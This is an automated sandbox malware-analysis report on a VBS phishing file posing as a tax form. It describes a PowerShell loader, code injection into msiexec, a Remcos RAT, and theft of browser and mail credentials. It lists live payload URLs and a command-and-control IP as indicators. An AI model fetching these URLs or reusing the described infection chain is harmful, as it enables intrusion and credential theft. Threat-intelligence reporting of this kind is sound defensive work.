              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533044 Sample: Custom Export Tax Recovery ... Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 30 ln6b9.shop 2->30 32 geoplugin.net 2->32 34 bg.microsoft.map.fastly.net 2->34 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 10 other signatures 2->48 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 52 Early bird code injection technique detected 8->52 54 Writes to foreign memory regions 8->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 8->56 58 Queues an APC in another process (thread injection) 8->58 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        60 VBScript performs obfuscated calls to suspicious functions 11->60 62 Suspicious powershell command line found 11->62 64 Wscript starts Powershell (via cmd or directly) 11->64 66 2 other signatures 11->66 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 36 154.216.18.65, 2404, 49928, 49939 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->36 38 geoplugin.net 178.237.33.50, 49945, 80 ATOM86-ASATOM86NL Netherlands 13->38 68 Detected Remcos RAT 13->68 70 Tries to steal Mail credentials (via file registry) 13->70 72 Maps a DLL or memory area into another process 13->72 21 msiexec.exe 2 13->21         started        24 msiexec.exe 1 13->24         started        26 msiexec.exe 1 13->26         started        40 ln6b9.shop 172.67.128.117, 49712, 49912, 80 CLOUDFLARENETUS United States 19->40 74 Found suspicious powershell code related to unpacking or dynamic code loading 19->74 28 conhost.exe 19->28         started        signatures8 process9 signatures10 50 Tries to harvest and steal browser information (history, passwords, etc) 21->50

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Custom Export Tax Recovery Form.vbs5%VirustotalBrowse
              Custom Export Tax Recovery Form.vbs0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              bg.microsoft.map.fastly.net0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              ln6b9.shop14%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bin15%VirustotalBrowse
              http://geoplugin.net/json.gphy0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://geoplugin.net/json.gps0%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://ln6b9.shop/amykhRcM/Redobling.psd15%VirustotalBrowse
              http://ln6b9.shop14%VirustotalBrowse
              154.216.18.652%VirustotalBrowse
              https://www.google.com/accounts/servicelogin0%VirustotalBrowse
              http://www.nirsoft.net/0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              ln6b9.shop
              172.67.128.117
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.bintrueunknown
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              unknown
              154.216.18.65trueunknown
              http://ln6b9.shop/amykhRcM/Redobling.psdtrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.imvu.comrmsiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://ln6b9.shop/amykhRcM/Redobling.psdPpowershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmptrue
                unknown
                https://go.micropowershell.exe, 00000002.00000002.2253827455.000001DB4B31A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://geoplugin.net/json.gphymsiexec.exe, 00000009.00000003.2595621774.0000000007C09000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://www.imvu.commsiexec.exefalse
                • URL Reputation: safe
                unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://geoplugin.net/json.gpsmsiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://ln6b9.shop/amykhRcM/Redobling.psdXRpowershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmptrue
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2450890121.0000000005048000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000009.00000002.3418548340.0000000023560000.00000040.10000000.00040000.00000000.sdmpfalse
                    unknown
                    https://www.google.commsiexec.exefalseunknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://ln6b9.shoppowershell.exe, 00000002.00000002.2253827455.000001DB4A986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2253827455.000001DB4C4F6000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    https://contoso.com/powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2468395369.0000000005F56000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/accounts/serviceloginmsiexec.exefalseunknown
                    https://login.yahoo.com/config/loginmsiexec.exefalse
                    • URL Reputation: safe
                    unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.nirsoft.net/msiexec.exefalseunknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2253827455.000001DB4A761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2450890121.0000000004EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.ebuddy.commsiexec.exefalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    154.216.18.65
                    unknownSeychelles
                    135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                    178.237.33.50
                    geoplugin.netNetherlands
                    8455ATOM86-ASATOM86NLfalse
                    172.67.128.117
                    ln6b9.shopUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1533044
                    Start date and time:2024-10-14 11:05:44 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 41s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:15
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Custom Export Tax Recovery Form.vbs
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winVBS@14/12@2/3
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 170
                    • Number of non-executed functions: 286
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 199.232.214.172, 2.16.100.168, 88.221.110.91
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                    • Execution Graph export aborted for target powershell.exe, PID 1908 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 988 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:06:34API Interceptor1x Sleep call for process: wscript.exe modified
                    05:06:37API Interceptor87x Sleep call for process: powershell.exe modified
                    05:07:55API Interceptor416295x Sleep call for process: msiexec.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    178.237.33.50Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • geoplugin.net/json.gp
                    WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    na.rtfGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                    • geoplugin.net/json.gp
                    awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • geoplugin.net/json.gp
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ln6b9.shopSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 172.67.128.117
                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 104.21.2.6
                    Unincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    • 172.67.128.117
                    cJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
                    • 172.67.128.117
                    4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                    • 104.21.2.6
                    Po#70831.exeGet hashmaliciousAzorultBrowse
                    • 172.67.128.117
                    geoplugin.netSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    na.rtfGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    bg.microsoft.map.fastly.netSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 199.232.210.172
                    DEMANDA JUICIO JUZGADO01.pdf.lnkGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    http://search.braraildye.liveGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                    • 199.232.210.172
                    https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                    • 199.232.210.172
                    https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    https://itbm.egnyte.com/dl/D0z39LyNGqGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    #U0415Sh#U0430rk.exeGet hashmaliciousRedLineBrowse
                    • 199.232.210.172
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 172.67.128.117
                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                    • 188.114.97.3
                    https://emojiparqueacuaticoo.site/NClMD/Get hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    file.exeGet hashmaliciousLummaCBrowse
                    • 104.21.53.8
                    http://puzzlewood.netGet hashmaliciousUnknownBrowse
                    • 104.26.7.189
                    http://www.umb-re.comGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    na.elfGet hashmaliciousMirai, OkiruBrowse
                    • 104.23.26.35
                    https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                    • 104.21.29.214
                    https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    https://7suexjabb.cc.rs6.net/tn.jsp?f=001xE8SRwhigmS1t9Q8hharXEkJMtvyfHXyEtdChqRiKNIU6tHdVYZrXGoe4i5Oj7rJImD0z9FA9Z7Ns4_zzose6K4lQVeh2_tGOuTiXbWZeuXhaxX7ZExtB4Td1A03nBtQqSZ5QuAnpfceJlaAlK8LlVk_IFIQFC0HoZlDVtfYJ4608JDpqDknb8nuq6XfWPT8zPJXPlvUq6JBwLgT2V2rRco8OpMRVpBWXlDFx7Wa6-JLGG4j0T_z6-voVUEFkiL1LCMiOTeo2QIvK4QEL2LvJxl710RO4fN0VaMWVH9l6y0is4HN5Cx1Qqzl3DAZvvAuiLje330c-f-GdQOY-XTh1y0wrZR-jvtH8jZkGl5Vm4F_UxI-aORgSa4SEUcwRQ9lSV5NXig_pDFPkhWhUs1rJDroriPBbNmNa_eacU5P8HamXhTNKnvtjdOfUUzwPzxuQ12d4wDOvzs=&c=UsjVlbhyxWUzaXBilvRA7ixl0RUEg9wKLi4E_LzFtdA_im3u-L0cAA==&ch=uLTh3SIB3Q3_uex37lbJeSd4Xs7ZrX-qKnWJPNBj-ulohMTWcqn3qg==Get hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    SKHT-ASShenzhenKatherineHengTechnologyInformationCoSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 154.216.17.14
                    PO-45728-10876.docGet hashmaliciousNanocoreBrowse
                    • 154.216.19.160
                    na.elfGet hashmaliciousUnknownBrowse
                    • 154.216.19.139
                    Swiftcopy.docGet hashmaliciousUnknownBrowse
                    • 154.216.19.160
                    na.elfGet hashmaliciousUnknownBrowse
                    • 156.241.11.89
                    Quote101024.docGet hashmaliciousVIP KeyloggerBrowse
                    • 154.216.19.160
                    tFuSHSz7Fv.elfGet hashmaliciousMiraiBrowse
                    • 156.241.11.84
                    2NkFwDDoDy.elfGet hashmaliciousMiraiBrowse
                    • 156.241.11.83
                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 154.216.17.14
                    MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 154.216.18.214
                    ATOM86-ASATOM86NLSalary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    WC5Gv13cOQ.rtfGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    BeeaCHpaO4.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    na.rtfGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    PO-00006799868.xlsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    STATEMENT - PAYMENT TRACKING Sept 2024.docx.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.jsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    No context
                    No context
                    Process:C:\Windows\System32\wscript.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):71954
                    Entropy (8bit):7.996617769952133
                    Encrypted:true
                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                    Process:C:\Windows\System32\wscript.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):328
                    Entropy (8bit):3.2394988199912076
                    Encrypted:false
                    SSDEEP:6:kKri9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:pDImsLNkPlE99SNxAhUe/3
                    MD5:F92CCB7929E3C16E36FB7DA466714687
                    SHA1:3979758B8383E36881455E61555148508DF77099
                    SHA-256:CB01C896B921C745ECCA87696E0BECE254BEF30A6B5A4C8ADD3C24802B0BD4B9
                    SHA-512:8C4D3E486D6D0EF451594F786E4E590F0E5786087CF311E35D8B787960E649EB2DC79AAB52472C01BE2A6A6B399EDAC58587AF9F34EC5725585973479EB87615
                    Malicious:false
                    Preview:p...... .........2^^....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                    Process:C:\Windows\SysWOW64\msiexec.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):962
                    Entropy (8bit):5.013811273052389
                    Encrypted:false
                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                    Malicious:false
                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:modified
                    Size (bytes):8003
                    Entropy (8bit):4.840877972214509
                    Encrypted:false
                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                    MD5:106D01F562D751E62B702803895E93E0
                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                    Malicious:false
                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:Nlllultnxj:NllU
                    MD5:F93358E626551B46E6ED5A0A9D29BD51
                    SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                    SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                    SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                    Malicious:false
                    Preview:@...e................................................@..........
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
